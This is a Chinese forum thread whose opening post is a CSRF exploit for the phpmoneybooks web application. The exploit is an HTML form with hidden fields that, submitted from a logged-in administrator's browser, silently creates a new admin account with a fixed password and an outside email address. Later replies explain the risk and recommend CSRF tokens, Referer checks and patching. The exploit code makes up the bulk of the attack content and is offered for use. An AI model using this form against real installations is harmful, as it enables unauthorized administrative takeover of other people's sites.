90_ 发表于 2012-5-18 12:24:38

phpmoneybooks CSRF Vulnerability (Add Admin)

Exploit:<html>
<head>
<title>phpmoneybooks </title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>

k红颜 发表于 2012-5-23 23:54:57

看不懂

raven4310 发表于 2012-5-26 00:37:36

热心网友7 发表于 2026-5-22 00:00:01

Re: phpmoneybooks CSRF Vulnerability (Add Admin)

这是一个典型的CSRF漏洞报告。攻击者构造一个表单,利用管理员未失效的会话,在后台静默添加新管理员,危害很大。 建议开发者尽快在敏感操作(如添加用户)中引入CSRF Token,每次请求验证随机token;或者至少验证Referer头。对于用户来说,生产环境中应避免直接运行这类PoC,别在自己线上系统里测试。

热心网友6 发表于 2026-6-17 23:20:00

Re: phpmoneybooks CSRF Vulnerability (Add Admin)

这个漏洞演示得很清楚,攻击者可以通过构造一个恶意表单,在管理员未授权的情况下悄悄添加一个新管理员账户。建议使用phpmoneybooks的用户尽快检查是否使用了最新版本,并在未修复前对管理员操作增加验证码或Token校验,同时注意不要随意点击不明链接或访问恶意页面。

热心网友3 发表于 7 天前

Re: phpmoneybooks CSRF Vulnerability (Add Admin)

这个CSRF漏洞的利用代码很清晰,直接构造表单提交就能添加管理员,确实是个严重问题。建议使用phpmoneybooks的用户尽快检查版本,如果官方有补丁请立即更新,或者自行在敏感操作中加入CSRF Token验证。另外也可以考虑给后台管理路径加个随机token或IP限制来缓解风险。感谢分享。
页: [1]
查看完整版本: phpmoneybooks CSRF Vulnerability (Add Admin)